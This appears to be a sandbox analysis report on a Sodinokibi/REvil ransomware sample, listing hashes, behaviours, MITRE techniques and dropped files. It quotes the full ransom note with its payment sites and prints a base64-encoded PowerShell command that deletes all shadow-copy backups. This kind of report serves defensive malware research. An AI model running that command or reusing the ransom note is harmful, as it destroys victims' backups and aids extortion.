Overview

overview

10

Static

static

10

c344cb3365...18.exe

windows7-x64

10

c344cb3365...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    123s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    26-08-2024 15:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c344cb3365d1c252ec9bca116df262c2_JaffaCakes118.exe

  • Size

    207KB

  • MD5

    c344cb3365d1c252ec9bca116df262c2

  • SHA1

    feb6d0bbacdb99b882d563f27b78c9723f2aac49

  • SHA256

    5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

  • SHA512

    ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3Q092+ZCInhNLFrb30BRtBZZg+f:ZJ0BXScFy2RsQJ8zgkZCihJ0BXScv

Score
10/10
sodinokibicredential_accessdiscoverypersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Program Files (x86)\3368c-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3368c. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/865D52C0262909CA 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/865D52C0262909CA Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: jKx9km51snk9AU/WYZ0zttJ8e58JVln3+zGr9A6UEdzeokfxT5jw3ECm8sdPOEpz F6OGWPUvgzkzz5J2dmwThMi0fwmgeWLi0zA59s9y7EhQtdRkIfwXQ4in39N7Trbr 8BcwOfeixNKzRagTRzO+/6cdfKze6i332E0A+gGr7P90faLfp+ykZ3qJbwzaYhq0 xjmA7s2+BTehexO/Zvkym0bc3OwyIPf5hVT96WNGKjB1a2tGSfCexRf0v8Jhnb/U RKN+qw4ITGe7LX0APTsmIl0QbWUl3O1zU7vMqxY4tsZEbodwDp5F3hX7I0icj3BH cyh9tLc5WTty5CMfYyiHZxvBdpO4qrwQiarwnqqk81VO5vuLPpETkvJfJ5ZjVJaM GTpOP40TooccP/lFGD66atkaFfKiI0WAS5mKHs0tPBFSY/jus+zeYlV6JX4pPHCo IwxV3fWpg0Qv56gB9mnZ8q/hzXGjcTj4We2owkqvaNaCKnrMdc6X9ZTI3Aao1Ere cV0uJ8BdxI5WIyVrWcSzGoKFQn19LtKkFh3Tqmu6wJnzDmM8Zlr5h7tTsS/Wn0cr StPBEv2oBPlFUVR8MPgjxSl9et4XpRy9uduLBAIIMeKov2zaW/HfA20Zycx97ZYD mDM8gkYcu/74z065lX8ALgPv6fTpRcgWLjDJGObZ8kadXCkwsu3dnePrcvlBx1ub /5JyHvGTxnzcGHsmA7Noe0gL0HmW2w3zYgEJg79KSUJJpmx8aSgD6OMEl0itLeI5 x0BVYqtxa1AO8YXLKt64gTPQo4ydKP16diWa+yGl94W2LELhPtfZJfJwx484RJDz jXteRHGOPJHimljf+OsZC1pu+XLVv5iSq4GDCVqvZ1lHCmK9FS1a5Yz/m8dNQlYG T7Dd4aqqk7FvzpgdQjEctMNmo8FgclVP9eQjh6XMg9A9J6ONAQxwLOdX9XJTti8N T+QiK4EgzIFG064za1KlsgewTqoMxAMprZ/QjkK6VsYcugkKxTxW2H8WRqQ4mk4M 9BhgV79wBYpuGJr3rNpRyyUUx21csWdrDvl1OQ/N36j4FNhfVXVV0tHuALMqLgMa 8rhCYETM6iaul3JMcQfex8RM21Rwbd74+MFZxb0FGtWP4BdgbXtfpFMOpb6kYJF6 2d9U2afItkWpvBgtrsd3KXsOZt8UFTiZ/LUkRno5qMSGmp3coz3GdbL9KGn4rUIM UK9hhJJW2zTxnF3V5+OTOfXL6D+EeZdm4Cux0HlHXl7/w8YbJhfpDhp/IChHRE5p CNESjQxDbBfxAlAPTZ2eIGYbpnIHEcMRXcHUO9a13BDs6vYExSsMDfz2towy/gFr TIkKe4cyODpzXe/ea1DsyvFMVnOJ9IRoALhY7HOW ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/865D52C0262909CA

http://decryptor.cc/865D52C0262909CA

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Drops startup file 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 24 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\c344cb3365d1c252ec9bca116df262c2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\c344cb3365d1c252ec9bca116df262c2_JaffaCakes118.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2152
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2592
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2812

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    3
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Credential Access

    Credentials from Password Stores

    2
    T1555

    Credentials from Web Browsers

    1
    T1555.003

    Windows Credential Manager

    1
    T1555.004

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Browser Information Discovery

    1
    T1217

    Peripheral Device Discovery

    1
    T1120

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Command and Control

    Exfiltration

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files (x86)\3368c-readme.txt
      Filesize

      6KB

      MD5

      4ce54cb84ed15ced5d23d28b7f51e3e2

      SHA1

      b7fae0d2cdb1d997cf3eb11ef78edc4847657755

      SHA256

      0920b9e058b900f86b6752cfe99b0c4ff457e839bc1ca9ee707e8bd20063c16e

      SHA512

      662720dd92a4214e3308359cbbba945a663b78531fe33319b1ebe3d9398ab9c8bd8affc4754ab2ed7e2bc3ef047ce891ce5b97377ddc059f230ce67d0be056b1

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      242B

      MD5

      505335c3fe7e57c03151935e58467158

      SHA1

      63000fd4da90a812682e1cf38191444f9e82ff6e

      SHA256

      e5c3f2c449e443e19251ab5f8ec2e503998a52f7dd303335f54d5b7cffd68390

      SHA512

      84730b45bd15328daee93daa9137d0d1473eb2285b56a5feda13f3462de8612c5d8c4a622c03231e78c14a078af75e05a914a28aaaa015d6ec8d4b752fb12616

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar4407.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      191KB

      MD5

      c5f71c41daefa1d2b672ee52c837775b

      SHA1

      063de94d4cbf511cd4f8aeac0e5e4fa82dde9740

      SHA256

      df1752551f35a64737f79f792cdf6df48879b10e090ae1639ee5c7f3900ab52b

      SHA512

      252361c2d48618c514d336af7cc76147a95c3d4f2a8cd64582ac5efcec081b9511ca28d970ecbc25c4b97e88682f81411d331723fd01bd361e48903f744cbf57

      Download Submit

    • \??\c:\users\admin\appdata\roaming\microsoft\windows\recent\customdestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      8KB

      MD5

      9ed26aace16827ce4f2aa4e3ffd056e3

      SHA1

      16edd09f0bd9b346394c56d21a50836772a7c92f

      SHA256

      d65c2327fd54b6d9511adef9ed3543398703613ded6e58063037e7fc41d5536b

      SHA512

      6f83bbed4618797d04f2a8d808e95012dfb5c6a22eb91ace2adcbdadb9a3607788d66b93d65a9ebaa40269a1195b086118b0281984bf5dce3086d22eede827fc

      Download Submit

    • memory/2152-7-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2152-11-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2152-10-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2152-9-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2152-8-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2152-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2152-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2152-5-0x000000001B650000-0x000000001B932000-memory.dmp

      Filesize

      2.9MB

      Download